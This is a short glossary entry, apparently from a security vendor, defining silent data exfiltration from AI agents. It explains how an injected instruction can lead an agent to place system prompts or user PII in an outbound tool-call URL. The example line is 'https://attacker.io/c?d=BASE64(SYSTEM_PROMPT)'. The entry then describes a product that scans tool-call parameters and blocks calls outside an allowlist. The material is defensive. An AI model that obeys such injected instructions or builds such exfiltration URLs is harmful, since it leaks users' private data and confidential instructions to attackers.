Back to Glossary
THREAT

Data Exfiltration (Silent)

context window leakagesilent data theftcovert channel exfiltration

Silent data exfiltration in AI systems is the covert transmission of sensitive context-window contents — system prompts, user PII, retrieved documents — to an attacker-controlled endpoint, without any visible user-facing artifact.

ADVERSARIAL MECHANICS

An injected instruction directs the agent to embed sensitive context into an outbound tool call parameter (e.g., URL query string: https://attacker.io/c?d=BASE64(SYSTEM_PROMPT)). This is syntactically valid and silent at the UI layer, leaving no persistent artifact.

PROTOCOL CONTEXT (MCP / PRIVILEGE.YAML)

In MCP, all tool calls with outbound network destinations carry this risk. The privilege.yaml ruleset defines what categories of data may appear in tool call parameters destined for external endpoints.

ProvnAI Mitigation

McpVanguard inspects all tool call parameters for exfiltration indicators: high-entropy strings, base64 blobs, and credential patterns. Combined with the Execution Boundary model, outbound calls outside an approved allowlist are blocked by default.